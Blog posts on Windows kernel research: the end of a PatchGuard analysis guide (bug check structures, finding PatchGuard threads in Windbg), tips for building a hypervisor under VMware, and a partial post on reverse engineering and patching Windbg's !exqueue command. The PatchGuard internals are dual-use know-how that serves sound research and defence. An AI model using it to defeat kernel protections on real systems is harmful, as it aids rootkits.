<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAPTYo_8Y9K3jv2PjlqJ0UFzBeGiqcl3p9U-eVwXamsSXVzF2RA-Tv92Shs2FgQzehz_sIA946YFazwSP5AmvUthgzdjYolwmE9_Pu5utlsm6lzA4wwLYz8TyUF4yfhX252hHP6CyrHS0/s1600/9.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAPTYo_8Y9K3jv2PjlqJ0UFzBeGiqcl3p9U-eVwXamsSXVzF2RA-Tv92Shs2FgQzehz_sIA946YFazwSP5AmvUthgzdjYolwmE9_Pu5utlsm6lzA4wwLYz8TyUF4yfhX252hHP6CyrHS0/s1600/9.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 10: Applied the structure definition</td></tr>
</tbody></table>
<br />
The second parameter is an address to the validation structure that detected corruption. There are multiple structures and each corresponds to a type of corrupted region (Arg4). Their formats vary but are mostly made up of at least: type of corrupted region, address(es) to verify, checksum(s) to be expected as valid value(s).<br />
<br />
The following is dump of the structure in this example (I commented with some guesswork):<br />
----<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">kd> <span style="color: red;">? b3b72bdfc9e65cc3 - 0xB3B74BDEE4453415 </span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Evaluate expression: -35180519544658 =<span style="color: red;"> ffffe000`e5a128ae</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">kd> dps <span style="color: red;">ffffe000`e5a128ae</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe000`e5a128ae 00000000`00000001 <span style="color: blue;">; type of corrupted region</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe000`e5a128b6 fffff801`00789000 nt!BcpCursor <PERF> (nt+0x36d000)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span style="color: blue;">; an address of .pdata </span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe000`e5a128be 244e1425`0004a9e8 <span style="color: blue;">; checksum?, a virtual size of .pdata</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe000`e5a128c6 fffff801`00789000 nt!BcpCursor <PERF> (nt+0x36d000)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span style="color: blue;">; an address of .pdata </span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe000`e5a128ce fffff801`0041c000 nt!WerLiveKernelInitSystem <PERF> (nt+0x0)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span style="color: blue;">; an address of nt image base</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe000`e5a128d6 0004a9e8`00842000 <span style="color: blue;">; a virtual size of .pdata, a size of nt image</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe000`e5a128de 39e90701`406ebd95 <span style="color: blue;">; chehcksums?</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe000`e5a128e6 78ca89f0`62a1f735</span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><span style="font-size: x-small;">...</span></span><br />
<div>
----<br />
<br />
Those structures are stored at the end of the PatchGuard context as a variable length of an array following other structures and code to recover corruption for reliable bug check and referenced using variable fields containing an offset and a number of arrays.<br />
<br />
<h3>
Discovering Threads Executing PatchGuard Code</h3>
another trick for run-time analysis is discovering threads running on memory and setting break points there. It is possible only when you are able to attach a kernel debugger to the system.<br />
<br />
As I mentioned earlier, PatchGuard contexts including their code are allocated on memory, which is either on executable NonPagedPool or independent pages allocated by MmAllocateIndependentPages(), and it exhibits uncommon outputs in the thread stack trace.<br />
----<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">kd> !process 4 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> THREAD ffffe00137df7040 Cid 0004.0064 Teb: ...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Win32 Start Address nt!ExpWorkerThread (0xfffff803d16ac3f0)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Child-SP RetAddr Call Site</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ffffd001`043ccdb0 fffff803`d1658ab9 nt!KiSwapContext+0x76</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ffffd001`043ccef0 fffff803`d1657fb8 nt!KiSwapThread+0x689</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ffffd001`043ccfb0 fffff803`d1621d0c nt!KiCommitThreadWait+0x148</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ffffd001`043cd040 ffffe001`37ede587 nt!KeDelayExecutionThread+0x1dc</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ffffd001`043cd0b0 4c91448e`dcd4c0fd <span style="color: red;">0xffffe001`37ede587</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ffffd001`043cd0b8 00000000`00000000 <span style="color: red;">0x4c91448e`dcd4c0fd</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">...</span><br />
----<br />
From this output, you can see that the thread 0x64 is calling KeDelayExecutionThread() from somewhere outside images. Obviously, it is not common unless you have malware in your system, especially considering the fact that the thread is a worker thread and even not a dedicated thread.<br />
<br />
Once you find a thread like this, you are free to set a break point at the return address and get control with the debugger.<br />
<div>
----</div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">kd> u </span><span style="color: red; font-family: 'Courier New', Courier, monospace; font-size: x-small;">0xffffe001`37ede587</span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe001`37ede587 jmp ffffe001`37ede5b5</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe001`37ede589 lea rax,[rbp+1A8h]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe001`37ede590 xor r9d,r9d</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe001`37ede593 xor r8d,r8d</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe001`37ede596 mov qword ptr [rsp+20h],rax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe001`37ede59b mov rcx,r13</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe001`37ede59e call qword ptr [rbp+68h]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe001`37ede5a1 test eax,eax</span></div>
</div>
</div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">kd> bp </span><span style="color: red; font-family: 'Courier New', Courier, monospace; font-size: x-small;">0xffffe001`37ede587</span><br />
<div>
----</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8zFcO03vUqjM1wbzYANlb81XyE5snEdnKS7LVD55YJ9Pgzroe838OvNXBrMqHTlq1k0-lse9sk4HlBLay7YFyqAtuhOX5VTvmtI4p-Scrcwym4fTvkyR1B_8BeqXEAYXFegHSKqVdOr0/s1600/11.png" imageanchor="1" style="margin-left: auto; margin-right: auto; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8zFcO03vUqjM1wbzYANlb81XyE5snEdnKS7LVD55YJ9Pgzroe838OvNXBrMqHTlq1k0-lse9sk4HlBLay7YFyqAtuhOX5VTvmtI4p-Scrcwym4fTvkyR1B_8BeqXEAYXFegHSKqVdOr0/s1600/11.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 11: Woohoo! Enjoy debugging.</td></tr>
</tbody></table>
This trick does not always work because PatchGuard sometimes skips sleep functions (KeDelayExecutionThread() or KeWaitForSingleObject()) and you do not catch the moment when a thread is executing code on memory, or PatchGuard sometimes runs inside of ntoskrn.exe and not on pool. But it is worth trying some times of reboot and checking if those threads exist.<br />
<br />
Note that if you want to read code around the return address with IDA, you can search the byte sequence at the return address with [Alt-B]. <br />
----<br />
<div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">kd> db 0xffffe001`37ede587 l10</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe001`37ede587 <span style="color: red;">eb 2c 48 8d 85 a8 01 00-00 45 33 c9 45 33 c0 48</span> .,H......E3.E3.H</span></div>
</div>
<div>
----</div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifEo-ylEk8rNfw6a-3HqXt8PgRY7xTbdbG-yBdJeaIm05nj2BnleA7HGvyCstxu172sKiZfEVJ9dlUebXLbuQsEQJ2cExZvtNsvPizQ7-O8Wzg5wqxk7J8GZ4naUsoaVfNzCxW1AIlduQ/s1600/10.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifEo-ylEk8rNfw6a-3HqXt8PgRY7xTbdbG-yBdJeaIm05nj2BnleA7HGvyCstxu172sKiZfEVJ9dlUebXLbuQsEQJ2cExZvtNsvPizQ7-O8Wzg5wqxk7J8GZ4naUsoaVfNzCxW1AIlduQ/s1600/10.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 12: Finding where the PatchGuard context is running in IDA </td></tr>
</tbody></table>
<br />
Another option is using a hypervisor to monitor and detect PatchGuard threads based on execution of some uncommon instructions if the system is running on the Intel platform. See my PoC <a href="https://github.com/tandasat/Sushi" target="_blank">Sushi</a> as an example.<br />
<br />
<h3>
Conclusion</h3>
We have seen how to locate functions, how to read 109 bug check parameters and how to discover threads running PatchGuard code. That is pretty much everything you need to know to get started. By now, you are ready for analyzing PatchGuard on Windows 10 where no one has ever succeeded in exploitation (at the time I wrote this article). All you have to do is just read code, name fields and functions, and test if your analysis is correct. That would not be anything special to us.<br />
<br />
<h3>
Special Thanks</h3>
Thank you very much <a href="https://twitter.com/Myriachan">@Myriachan</a> for providing me many details about Windows RT and an opportunity to work on this fun project.<br />
<br /></div>
</div>
</div>
</div>
</div>
Satoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.com0tag:blogger.com,1999:blog-2937860723034111347.post-23148599526617540122015-08-08T10:18:00.003-07:002015-11-01T17:22:34.794-08:00Writing a Hypervisor for Kernel Mode Code Analysis and Fun<div>
In this entry, I am going to share some tips to develop your own hypervisors using VMware Workstation and briefly introduce a sample ring-1 monitoring tool based on a home made hypervisor. This entry may not be for you if you already have your own hypervisors you can update at your disposal or are not interested in development at all. </div>
<div>
<br />
<h3>
Motivation</h3>
</div>
You know that hypervisors are helpful for dynamic analysis, and most of you use them in some forms. However, I guess not many of researchers have ever written by your self might be because it sounds challenging, while it can be quite handy and fun to have ring-1 monitoring tools you can update however you want. You may, for example, want to detect and monitor <strike>PatchGuard contexts</strike> a piece of kernel mode code that relocates itself onto a random memory location and performs some uncommon operations such as disabling write protection with modifying the CR0, clearing hardware breakpoints with resetting the DR7 and accessing IDTR using the SIDT and LIDT instructions. Without having hypervisors, you are not able to detect any of those operations as those are just instructions, and you do not know where to set breakpoints due to periodic relocation. But if you wish, do hypervisors help you accomplish it.<br />
<div>
<div>
<br /></div>
<div>
Now, you may wonder why you want to write your own hypervisors even though there are quite a few open source projects you could re-purpose. The reason is "it sounds better if you say that you wrote your own hypervisor from scratch." ;) Besides, reading full-fledged hypervisors may not be as enjoyable as writing your own code. Let us see how you can do it.<br />
<br /></div>
<div>
<h3>
What You Need</h3>
</div>
</div>
<div>
You need VMware Workstation as a test environment. It supports nested virtualization (emulation of VT-x technology) and lets you debug your hypervisor code form the host Windows through Windbg in the exact same manner as regular kernel debugging.<br />
<br />
You may also be able to use other VMware products that support nested virtualization like Fusion, but you will have to configure kernel debugging between two VMs, which is not the most straightforward way. Also, having Windows as a host lets you use <a href="http://virtualkd.sysprogs.org/" target="_blank">VirtualKD</a> which makes communication between a debugee and a debugger very fast. VirtualBox, unfortunately, does not support nested VM and allow to execute VMX operations in it. </div>
<div>
<br /></div>
<div>
If you are paranoia and do not trust software emulated VT-x, you could use a real box with a serial port (which means it is not going to be a laptop) as a debugee. You might already know that kernel debugging through USB is possible. DO NOT GO THERE unless you already have hardware that was confirmed that it supports USB debugging. There are some subtle requirements which you will not tell if a debugee device suffices by just looking at the specs online. Besides that, being able to take snapshots and memory dump from a hanged machine using VMware drastically speeds up your development.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrE_YFnxIglnSr3smGI__Hvw_PtU0WppOCnYKaod6iuTijCY5ZmWia6F8uBzrXiCqvxaleZ8A0h-b-vd3ah48ArGjVbBhmPyruM7FZpq-lqJ81A-HS03jpD_TWv3wxlLr3Ljh45lzT7Cw/s1600/4qZ92uG.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrE_YFnxIglnSr3smGI__Hvw_PtU0WppOCnYKaod6iuTijCY5ZmWia6F8uBzrXiCqvxaleZ8A0h-b-vd3ah48ArGjVbBhmPyruM7FZpq-lqJ81A-HS03jpD_TWv3wxlLr3Ljh45lzT7Cw/s1600/4qZ92uG.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 1: USB2 debug-cable. Not recommended.</td></tr>
</tbody></table>
</div>
<div>
<h3>
</h3>
<h3>
Configuring Virtual Machines</h3>
</div>
<div>
You have to make some changes in a debugee virtual machine. Firstly, you have to check the following options:</div>
<div>
<ul>
<li>Virtualize Intel VT-x/EPT or AMD-V/RVI</li>
<li>Virtualize CPU performance counters</li>
</ul>
</div>
<div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1Y7bBiFUwRnuZsKESvV3VJOOc5xzUPp4EyM1W02zoHdl_kU5yGW9wwlQVRMr0kUlJRFAmfzEJZph0oXsDWIvuInHw4YW_P9KXnNgUVB_5Yr2iluGTB4K_2wdGXFiuXkqzwHc4Ig2DB3M/s1600/vm_config.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1Y7bBiFUwRnuZsKESvV3VJOOc5xzUPp4EyM1W02zoHdl_kU5yGW9wwlQVRMr0kUlJRFAmfzEJZph0oXsDWIvuInHw4YW_P9KXnNgUVB_5Yr2iluGTB4K_2wdGXFiuXkqzwHc4Ig2DB3M/s1600/vm_config.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 2: Virtual Machine Config</td></tr>
</tbody></table>
<br />
Secondly, you should add those lines in a corresponding VMX file <a href="http://social.technet.microsoft.com/wiki/contents/articles/22283.how-to-install-hyper-v-on-vmware-workstation-10.aspx" target="_blank">[1]</a>, otherwise you will end up with getting mysterious, random-looking NMI_HARDWARE_FAILURE bug check.<br />
----</div>
<div>
<span style="font-family: Courier New, Courier, monospace;">hypervisor.cpuid.v0 = "FALSE"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">mce.enable = "TRUE"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">vhu.enable = "TRUE" </span></div>
<div>
----<br />
<br />
<span style="font-size: x-small;">EDIT (Nov 1, 2015): Removed entries with apic.xapic since I confirmed that it still worked without them.</span><br />
<br /></div>
<div>
<h3>
Gotchas</h3>
</div>
<div>
Once you have configured the VM, the rest is only a matter of programming, but there are some gotchas I would like to share to keep you sane:<br />
<ul>
<li>Try to avoid use of APIs inside a VMExit handler (in VMX root mode). Since the handler can be executed from any contexts including exception handlers or code under a very high IRQL, it is tough to conclude that calling an API which you do not know *exactly* what it does is 100% safe. </li>
<li>For the same reason, avoid calling DbgPrint() from the VMExit handler. It usually works fine but sometimes causes mysterious errors like triple fault when you request a lot of log. Instead, store log texts into pre-allocated non-paged pool and print them out later from a safe context. </li>
<li>Do not step-in to vmlaunch and vmresume instructions. The debugger will never return control to you, and the debugee will hang. </li>
<li>Do not put software breakpoints everywhere in the VMExit handler. Although it seems to be fine in most cases, in some situation, the debugger does not get control from the debugee, and the system just freezes when int 3 is executed. </li>
</ul>
</div>
<div>
<h3>
</h3>
<h3>
Getting Memory Dump From a Hanged Debugee System</h3>
One of the biggest advantages of using VMware is that you can take memory dump (.dmp files) from a hanged debugee and give it to Windbg just like normal crash dump analysis. </div>
<div>
<br />
To take a dump file, first you suspend the virtual machine when it is freezed and take a snapshot.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSJ2-X5Bd38O9Wx0BRSwqnzmlhc_Bwq_RcZE3sIqRLULAJ49fKpxfpRH8T9rD7XDK36ArmIbxAaS11MSpVZ2Hf6cBmhespMl51w-vo_nihhLhNB8sc2kSFbT5hafT2_MdpRXH0PDaAckk/s1600/suspend.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSJ2-X5Bd38O9Wx0BRSwqnzmlhc_Bwq_RcZE3sIqRLULAJ49fKpxfpRH8T9rD7XDK36ArmIbxAaS11MSpVZ2Hf6cBmhespMl51w-vo_nihhLhNB8sc2kSFbT5hafT2_MdpRXH0PDaAckk/s1600/suspend.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 3: Suspend a hanged virtual machine</td></tr>
</tbody></table>
<br />
Then, navigate to where snapshot files are stored and run the vmss2core command under the VMware Workstation directory with names of the latest vmsn and vmem files. For instance, commands look like this:<br />
----<br />
<span style="font-family: Courier New, Courier, monospace;">> cd "C:\Users\user\Documents\Virtual Machines\Windows 8 x64"</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">> "C:\Program Files (x86)\VMware\VMware Workstation\vmss2core-win.exe" -W8 "Windows 8 x64-Snapshot45.vmsn" "Windows 8 x64-Snapshot45.vmem"</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">vmss2core version <span style="color: red;">2452889 </span>Copyright (C) 1998-2015 VMware, Inc. All rights reserved.</span><br />
<span style="font-family: Courier New, Courier, monospace;">scanning pa=0 len=0x10000000</span><br />
<span style="font-family: Courier New, Courier, monospace;">Cannot translate linear address 7ff7d12b1b00.</span><br />
<span style="font-family: Courier New, Courier, monospace;">Cannot read context LA from PRCB.</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">... 2020 MBs written.</span><br />
<span style="font-family: Courier New, Courier, monospace;">... 2030 MBs written.</span><br />
<span style="font-family: Courier New, Courier, monospace;">... 2040 MBs written.</span><br />
<span style="font-family: Courier New, Courier, monospace;">Finished writing core.</span><br />
----<br />
Note that vmss2core comes with VMware Workstation by default (version 2780323) does not seem to be functioning (always generates 0 byte of empty files). If that the case for you too, download version 2452889 from <a href="https://labs.vmware.com/flings/vmss2core" target="_blank">VMware's website</a>.<br />
<br />
Now, you have gotten the memory.dmp and can give it to the debugger.<br />
----<br />
<span style="font-family: Courier New, Courier, monospace;">> windbg -z memory.dmp</span><br />
<div>
----</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUscBWaZZhuH1o_7rCNfVUEsJ3al7457nmBiA86ITI7J-Tm23C7ry7lDMblJc5NVZ6pTpEYdA5lDWnITCH-8rp_WoBLLMgVJLrQ5MF6NkUfnnzTSCFQjlN2z1AcPacNQpE45mMGO6sL_s/s1600/dump.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUscBWaZZhuH1o_7rCNfVUEsJ3al7457nmBiA86ITI7J-Tm23C7ry7lDMblJc5NVZ6pTpEYdA5lDWnITCH-8rp_WoBLLMgVJLrQ5MF6NkUfnnzTSCFQjlN2z1AcPacNQpE45mMGO6sL_s/s1600/dump.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 4: Memory dump analysis</td></tr>
</tbody></table>
<br />
<ul>
<li>Link: <a href="http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2003941" target="_blank">Converting a snapshot file to memory dump using the vmss2core tool (2003941)</a></li>
</ul>
<br />
<br />
<h3>
References</h3>
There are some open source hypervisor projects you can refer to for implementation. Those are small enough to read quickly and written for Windows hosts.<br />
<ul>
<li><a href="https://github.com/zer0mem/MiniHyperVisorProject" target="_blank">MiniHyperVisorProject</a> by Peter Hlavaty</li>
<li><a href="https://code.google.com/p/bluepillstudy/" target="_blank">Blue Pill</a> by Joanna Rutkowska</li>
<li><a href="https://code.google.com/p/virtdbg/" target="_blank">virtdbg</a></li>
<li><a href="https://code.google.com/p/hyperdbg/" target="_blank">hyperdbg</a></li>
</ul>
</div>
<div>
<br /></div>
<div>
<h3>
A Sample Monitoring Tool Based on a Hypervisor</h3>
With those tips, you should be able to develop your own hypervisor fairly smoothly and utilize it for your research. I, for example, wrote a proof-of-concept hypervisor, <a href="https://github.com/tandasat/Sushi" target="_blank">Sushi</a>, monitoring use of some uncommon instructions from non-image kernel space and stopping a thread when write protection in CR0 is modified.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBY-Tu9z9I_MNt8aTwPhoHawaEWlDahyphenhyphenQeQDqnfZy65pe98ShXdiOhpoShEv-RGsnftvx7YrVq4b5wyRt2JkhX6QJJeREPGmXF43M4wqGJdqngd4z6j4PhpJB0X90EC8Ccs30QXs6tAQ4/s1600/sushi.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="549" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBY-Tu9z9I_MNt8aTwPhoHawaEWlDahyphenhyphenQeQDqnfZy65pe98ShXdiOhpoShEv-RGsnftvx7YrVq4b5wyRt2JkhX6QJJeREPGmXF43M4wqGJdqngd4z6j4PhpJB0X90EC8Ccs30QXs6tAQ4/s640/sushi.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 5: Demo hypervisor "Sushi" detecting interesting stuff</td></tr>
</tbody></table>
<br /></div>
<div>
This is less than 4000 lines of code yet gives me an ability to investigate some run-time behaviour of the kernel I was unable to monitor. It is pretty awesome, and above all, playing with low-level stuff like this is quite fun.<br />
<br />
In short, if you are interested in developing hypervisors for whatever reasons, you can do it without buying any extra hardware, and then, you can also make it one of your analysis tools like this demo hypervisor.<br />
<br />
<h3>
Thanks</h3>
Thank you @brucedang for letting me know that nested virtualization of VMware is reliable enough to write and test hypervisors.</div>
Satoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.com14tag:blogger.com,1999:blog-2937860723034111347.post-44266150861590569952015-06-07T13:52:00.001-07:002015-10-18T11:16:45.320-07:00Reverse Engineering Windbg Commands for Profit <script src="https://google-code-prettify.googlecode.com/svn/loader/run_prettify.js"></script>
In this article, I will introduce benefit of reverse engineering Windbg for understanding the Windows kernel with looking at an undocumented command, fixing an issue in it and re-implementing the same functionality on a device driver.<br />
<br />
<br />
Windbg is a powerful resource not only because you can see thorough run-time information even if you do not know how to manually do that but also you can learn how Windbg does that with reverse engineering it. Implementation of the <a href="https://msdn.microsoft.com/en-us/library/windows/hardware/ff565456(v=vs.85).aspx" target="_blank">!timer</a> command is, for example, where you should examine if you want to know how to enumerate all scheduled timer callbacks.<br />
<br />
But, what if you cannot find the command that works with internals you are interested in? In my case, I was looking for a way to list items inserted into the work queues with ExQueueWorkItem(), and documents of Windbg did not tell what command I could use.<br />
<br />
<h3>
Finding an Undocumented Command</h3>
There are many undocumented commands in Windbg. By using strings.exe against DLL files under the Windbg folder, you will get hints about them and/or where to look at. Here is a result of search for "workqueue":<br />
<br />
<span style="font-size: xx-small;">Debuggers\x64><span style="color: red;">strings -n 5 -s *.dll | findstr /i workqueue</span></span><br />
<span style="font-size: xx-small;">...</span><br />
<span style="font-size: xx-small;">Debuggers\x64\winxp\kdexts.dll: **** NUMA Node %i RealTime WorkQueue</span><br />
<span style="font-size: xx-small;">Debuggers\x64\winxp\kdexts.dll: **** NUMA Node %i HyperCritical WorkQueue</span><br />
<span style="font-size: xx-small;">Debuggers\x64\winxp\kdexts.dll: **** NUMA Node %i SuperCritical WorkQueue</span><br />
<span style="font-size: xx-small;">Debuggers\x64\winxp\kdexts.dll: **** NUMA Node %i Critical WorkQueue</span><br />
<span style="font-size: xx-small;">Debuggers\x64\winxp\kdexts.dll: **** NUMA Node %i Delayed WorkQueue</span><br />
<span style="font-size: xx-small;">Debuggers\x64\winxp\kdexts.dll: **** NUMA Node %i Normal WorkQueue</span><br />
<span style="font-size: xx-small;">Debuggers\x64\winxp\kdexts.dll: **** NUMA Node %i Background WorkQueue</span><br />
<span style="font-size: xx-small;">Debuggers\x64\winxp\kdexts.dll: **** Critical WorkQueue</span><br />
<span style="font-size: xx-small;">Debuggers\x64\winxp\kdexts.dll: **** Delayed WorkQueue</span><br />
<span style="font-size: xx-small;">Debuggers\x64\winxp\kdexts.dll: **** HyperCritical WorkQueue</span><br />
<span style="font-size: xx-small;">Debuggers\x64\winxp\kdexts.dll: ExWorkQueue</span><br />
<span style="font-size: xx-small;">...</span><br />
<br />
With firing up IDA, I easily found that there was an undocumented (*1) command named !exqueue and it was exactly what I wanted.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">kd> !kdexts.help</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">exqueue [flags] - Dump the ExWorkerQueues</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">...</span><br />
<br />
<h3>
Fixing an Issue</h3>
The issue was that this commend did not work against Windows 8.1 and 10 targets.<br />
<br />
<span style="font-size: xx-small;">kd> !exqueue</span><br />
<span style="font-size: xx-small;">GetGlobalValue: unable to get NT!KeNumberNodes type size</span><br />
<br />
So, I started to debug and reverse engineer kdexts.dll a bit more, then noticed that Windbg was failing to read the nt!KeNumberNodes, which is always 1 unless you use NUMA, and a solution was just patching code to set 1 to eax.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">.text:00000001801161DA lea rcx, aNtKenumbernode </span><span style="color: blue; font-family: 'Courier New', Courier, monospace; font-size: xx-small;">; "NT!KeNumberNodes"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><strike>.text:00000001801161E1 call read_global_variable</strike></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace; font-size: xx-small;">.text:00000001801161E1 mov eax, 1</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">.text:00000001801161E6 mov rbx, cs:qword_1801A8500</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">.text:00000001801161ED mov rcx, rbx</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">.text:00000001801161F0 mov rbp, rax</span><br />
<br />
Here is an output:<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">kd> !exqueue</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="font-size: xx-small;"><br /></span>
<span style="font-size: xx-small;">**** NUMA Node 0 - ( Threads: 7/4096 ) ****</span></span><br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: xx-small;">...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> -> Priority 12 - ( Concurrency: 0/2 )</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> <span style="color: red;">ExWorkItem (ffffe00084a91160) </span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><span style="color: red;"> Routine ListWorkItems!<lambda_bae...> </span>(fffff800746e5290) </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> Parameter (fffff800746e7220)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> <span style="color: red;">ExWorkItem (ffffe0008105ff10) </span></span><br />
